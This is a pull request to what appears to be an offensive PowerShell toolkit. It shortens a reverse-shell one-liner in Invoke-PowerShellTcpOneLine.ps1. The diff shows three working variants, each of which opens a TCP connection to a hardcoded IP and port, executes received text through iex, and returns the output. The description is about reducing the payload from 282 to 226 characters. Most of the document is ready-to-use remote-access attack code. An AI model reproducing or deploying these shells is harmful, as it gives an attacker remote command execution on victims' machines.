### PR TITLE
Compact Invoke-PowerShellTcpOneLine.ps1

### DIFF
--- a/Shells/Invoke-PowerShellTcpOneLine.ps1
+++ b/Shells/Invoke-PowerShellTcpOneLine.ps1
@@ -2,5 +2,5 @@
 #Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
 #$client = New-Object System.Net.Sockets.TCPClient('192.168.254.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 
-#$sm=(New-Object Net.Sockets.TCPClient('192.168.254.1',55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
+#$s=([Net.Sockets.TCPClient]::new('192.168.254.1',55555)).GetStream();$b=[byte[]]'0'*65535;$a=[Text.Encoding]::ASCII;while($i=$s.Read($b,0,65535)){$d=$a.GetString($b,0,$i);$t=$a.GetBytes((iex $d 2>&1));$s.write($t,0,$t.length)}
 


### PR DESCRIPTION
I compacted down one of the shells in Invoke-PowerShellTcpOneLine.ps1, since it seems like it's purpose is to be as small as possible, but there were more optimizations that could be made. The old length was 282 characters, now it's 226. I renamed some of the 2-letter variables to 1 letter, changed some of the function calls (like creating the TCPClient object), saved the [Text.Encoding]::ASCII object to a variable (since it's used twice), and some other small things like removing unnecessary semicolons.